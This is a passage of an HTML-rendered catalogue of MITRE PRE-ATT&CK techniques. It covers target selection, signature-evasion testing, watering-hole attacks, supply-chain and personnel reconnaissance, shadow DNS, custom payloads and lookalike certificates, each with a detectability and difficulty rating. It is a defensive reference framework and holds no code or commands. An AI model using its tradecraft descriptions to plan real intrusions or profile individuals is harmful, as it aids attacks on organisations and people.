<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1066">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1066</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_operational_element_pre_t1019"><a class="anchor" href="#_determine_operational_element_pre_t1019"></a><a class="link" href="#_determine_operational_element_pre_t1019">Determine operational element - PRE-T1019</a></h3>
<div class="paragraph">
<p>If going from strategic down to tactical or vice versa, an adversary would next consider the operational element. For example, the specific company within an industry or agency within a government. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12 &#174;) (Citation: DoD Cyber 2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1602. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1019">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1019</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_test_signature_detection_for_file_upload_email_filters_pre_t1138"><a class="anchor" href="#_test_signature_detection_for_file_upload_email_filters_pre_t1138"></a><a class="link" href="#_test_signature_detection_for_file_upload_email_filters_pre_t1138">Test signature detection for file upload/email filters - PRE-T1138</a></h3>
<div class="paragraph">
<p>An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Use of sites like [<a href="https://www.virustotal.com" class="bare">https://www.virustotal.com</a> VirusTotal] to test signature detection often occurs to test detection. Defender can also look for newly added uploads as a precursor to an adversary&#8217;s launch of an attack.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Current open source technologies and websites exist to facilitate adversary testing of malware against signatures.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1603. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1138">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1138</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_highest_level_tactical_element_pre_t1020"><a class="anchor" href="#_determine_highest_level_tactical_element_pre_t1020"></a><a class="link" href="#_determine_highest_level_tactical_element_pre_t1020">Determine highest level tactical element - PRE-T1020</a></h3>
<div class="paragraph">
<p>From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12 &#174;) (Citation: DoD Cyber 2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1604. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1020">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1020</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_targeted_client_side_exploitation_pre_t1148"><a class="anchor" href="#_targeted_client_side_exploitation_pre_t1148"></a><a class="link" href="#_targeted_client_side_exploitation_pre_t1148">Targeted client-side exploitation - PRE-T1148</a></h3>
<div class="paragraph">
<p>A technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user&#8217;s computer. (Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defensive technologies exist to scan web content before delivery to the requested end user. However, this is not foolproof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised. The added challenge for a conditional watering hole is the reduced scope and likely reduced ability to detect or be informed. Determining deltas in content (e.g., differences files type/size/number/hashes) downloaded could also aid in detection.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery. The additional challenge is the reduced set of options for web sites to compromise since the set is reduced to those often visited by targets of interest.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1605. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1148">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1148</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1042"><a class="anchor" href="#_identify_supply_chains_pre_t1042"></a><a class="link" href="#_identify_supply_chains_pre_t1042">Identify supply chains - PRE-T1042</a></h3>
<div class="paragraph">
<p>Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Searching publicly available sources that cannot be monitored by a defender.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires an intensive process to obtain the full picture. It is possible to obtain basic information/some aspects via OSINT. May be easier in certain industries where there are a limited number of suppliers (e.g., SCADA).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1606. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1042">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1042</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_install_and_configure_hardware_network_and_systems_pre_t1113"><a class="anchor" href="#_install_and_configure_hardware_network_and_systems_pre_t1113"></a><a class="link" href="#_install_and_configure_hardware_network_and_systems_pre_t1113">Install and configure hardware, network, and systems - PRE-T1113</a></h3>
<div class="paragraph">
<p>An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Skills are common to majority of computer scientists and "hackers". Can be easily obtained through contracting if not organic to adversary&#8217;s organization.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1607. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1113">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1113</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_host_based_hiding_techniques_pre_t1091"><a class="anchor" href="#_host_based_hiding_techniques_pre_t1091"></a><a class="link" href="#_host_based_hiding_techniques_pre_t1091">Host-based hiding techniques - PRE-T1091</a></h3>
<div class="paragraph">
<p>Host based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weakness in file formats, parsers, or self-deleting code. (Citation: VirutAP)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Techniques are difficult to detect and might occur in uncommon use-cases (e.g., patching, anti-malware, anti-exploitation software).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Some of the host-based hiding techniques require advanced knowledge combined with an understanding and awareness of the target&#8217;s environment (e.g., exploiting weaknesses in file formats, parsers and detection capabilities).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1608. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1091">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1091</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_physical_locations_pre_t1059"><a class="anchor" href="#_determine_physical_locations_pre_t1059"></a><a class="link" href="#_determine_physical_locations_pre_t1059">Determine physical locations - PRE-T1059</a></h3>
<div class="paragraph">
<p>Physical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary searches publicly available sources that list physical locations that cannot be monitored by a defender or are not necessarily monitored (e.g., all IP addresses touching their public web space listing physical locations).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Most corporations now list their locations on public facing websites. Some challenge still exists to find covert or sensitive locations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1609. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1059">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1059</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_conduct_cost_benefit_analysis_pre_t1003"><a class="anchor" href="#_conduct_cost_benefit_analysis_pre_t1003"></a><a class="link" href="#_conduct_cost_benefit_analysis_pre_t1003">Conduct cost/benefit analysis - PRE-T1003</a></h3>
<div class="paragraph">
<p>Leadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Toptic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1610. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1003">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1003</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_receive_kits_kiqs_and_determine_requirements_pre_t1016"><a class="anchor" href="#_receive_kits_kiqs_and_determine_requirements_pre_t1016"></a><a class="link" href="#_receive_kits_kiqs_and_determine_requirements_pre_t1016">Receive KITs/KIQs and determine requirements - PRE-T1016</a></h3>
<div class="paragraph">
<p>Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary&#8217;s nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1611. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1016">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1016</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_presence_of_outsourced_capabilities_pre_t1080"><a class="anchor" href="#_analyze_presence_of_outsourced_capabilities_pre_t1080"></a><a class="link" href="#_analyze_presence_of_outsourced_capabilities_pre_t1080">Analyze presence of outsourced capabilities - PRE-T1080</a></h3>
<div class="paragraph">
<p>Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Much of this analysis can be done using the target&#8217;s open source website, which is purposely designed to be informational and may not have extensive visitor tracking capabilities.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Analyzing business relationships from information gathering may provide insight into outsourced capabilities. In certain industries, outsourced capabilities or close business partnerships may be advertised on corporate websites.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1612. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1080">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1080</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_create_implementation_plan_pre_t1009"><a class="anchor" href="#_create_implementation_plan_pre_t1009"></a><a class="link" href="#_create_implementation_plan_pre_t1009">Create implementation plan - PRE-T1009</a></h3>
<div class="paragraph">
<p>Implementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1613. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1009">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1009</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_non_traditional_or_less_attributable_payment_options_pre_t1093"><a class="anchor" href="#_non_traditional_or_less_attributable_payment_options_pre_t1093"></a><a class="link" href="#_non_traditional_or_less_attributable_payment_options_pre_t1093">Non-traditional or less attributable payment options - PRE-T1093</a></h3>
<div class="paragraph">
<p>Using alternative payment options allows an adversary to hide their activities. Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender likely will not have access to payment information. Monitoring crypto-currency or barter boards is resource intensive and not fully automatable.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Easy to use pre-paid cards or shell accounts to pay for services online. Crypto currencies and barter systems can avoid use of trace-able bank or credit apparatus.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1614. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1093">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1093</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aggregate_individual_s_digital_footprint_pre_t1052"><a class="anchor" href="#_aggregate_individual_s_digital_footprint_pre_t1052"></a><a class="link" href="#_aggregate_individual_s_digital_footprint_pre_t1052">Aggregate individual&#8217;s digital footprint - PRE-T1052</a></h3>
<div class="paragraph">
<p>In addition to a target&#8217;s social media presence may exist a larger digital footprint, such as accounts and credentials on e-commerce sites or usernames and logins for email. An adversary familiar with a target&#8217;s username can mine to determine the target&#8217;s larger digital footprint via publicly available sources. (Citation: DigitalFootprint) (Citation: trendmicro-vtech)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Searching publicly available sources that cannot be monitored by a defender.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Information readily available through searches</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1615. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1052">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1052</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_sensitive_personnel_information_pre_t1051"><a class="anchor" href="#_identify_sensitive_personnel_information_pre_t1051"></a><a class="link" href="#_identify_sensitive_personnel_information_pre_t1051">Identify sensitive personnel information - PRE-T1051</a></h3>
<div class="paragraph">
<p>An adversary may identify sensitive personnel information not typically posted on a social media site, such as address, marital status, financial history, and law enforcement infractions. This could be conducted by searching public records that are frequently available for free or at a low cost online. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Searching publicly available sources that cannot be monitored by a defender.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This type of information is useful to understand the individual and their ability to be blackmailed. Searching public records is easy and most information can be purchased for a low cost if the adversary really wants it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1616. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1051">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1051</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_human_performs_requested_action_of_physical_nature_pre_t1162"><a class="anchor" href="#_human_performs_requested_action_of_physical_nature_pre_t1162"></a><a class="link" href="#_human_performs_requested_action_of_physical_nature_pre_t1162">Human performs requested action of physical nature - PRE-T1162</a></h3>
<div class="paragraph">
<p>Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Non-hypersensing environments do not typically collect this level of detailed information.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Ill-informed users insert devices into their network that they randomly find, despite training educating them why this is not a wise idea.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1617. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1162">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1162</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assess_opportunities_created_by_business_deals_pre_t1076"><a class="anchor" href="#_assess_opportunities_created_by_business_deals_pre_t1076"></a><a class="link" href="#_assess_opportunities_created_by_business_deals_pre_t1076">Assess opportunities created by business deals - PRE-T1076</a></h3>
<div class="paragraph">
<p>During mergers, divestitures, or other period of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests, or other non standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Most of this activity would target partners and business processes. Partners would not report. Difficult to tie this activity to a cyber attack.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Mapping joint infrastructure and business processes is difficult without insider knowledge or SIGINT capability. While a merger creates and opportunity to exploit potentially cumbersome or sloppy business processes, advance notice of a merger is difficult; merger information is typically close-hold until the deal is done.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1618. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1076">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1076</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shadow_dns_pre_t1117"><a class="anchor" href="#_shadow_dns_pre_t1117"></a><a class="link" href="#_shadow_dns_pre_t1117">Shadow DNS - PRE-T1117</a></h3>
<div class="paragraph">
<p>The process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. (Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Detection of this technique requires individuals to monitor their domain registrant accounts routinely. In addition, defenders have had success with blacklisting sites or IP addresses, but an adversary can defeat this by rotating either the subdomains or the IP addresses associated with the campaign.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: To successfully conduct this attack, an adversary usually phishes the individual behind the domain registrant account, logs in with credentials, and creates a large amount of subdomains.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1619. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1117">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1117</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_create_custom_payloads_pre_t1122"><a class="anchor" href="#_create_custom_payloads_pre_t1122"></a><a class="link" href="#_create_custom_payloads_pre_t1122">Create custom payloads - PRE-T1122</a></h3>
<div class="paragraph">
<p>A payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: It is likely that an adversary will create and develop payloads on inaccessible or unknown networks for OPSEC reasons.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Specialized tools exist for research, development, and testing of virus/malware payloads.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1620. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1122">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1122</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1045"><a class="anchor" href="#_conduct_social_engineering_pre_t1045"></a><a class="link" href="#_conduct_social_engineering_pre_t1045">Conduct social engineering - PRE-T1045</a></h3>
<div class="paragraph">
<p>Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1621. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1045">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1045</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ssl_certificate_acquisition_for_domain_pre_t1114"><a class="anchor" href="#_ssl_certificate_acquisition_for_domain_pre_t1114"></a><a class="link" href="#_ssl_certificate_acquisition_for_domain_pre_t1114">SSL certificate acquisition for domain - PRE-T1114</a></h3>
<div class="paragraph">
<p>Certificates are designed to instill trust. They include information about the key, information about its owner&#8217;s identity, and the digital signature of an entity that has verified the certificate&#8217;s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user in to trusting the domain (e.g., vvachovia instead of [<a href="https://www.wellsfargo.com/about/corporate/wachovia/" class="bare">https://www.wellsfargo.com/about/corporate/wachovia/</a> Wachovia]&#8201;&#8212;&#8201;homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
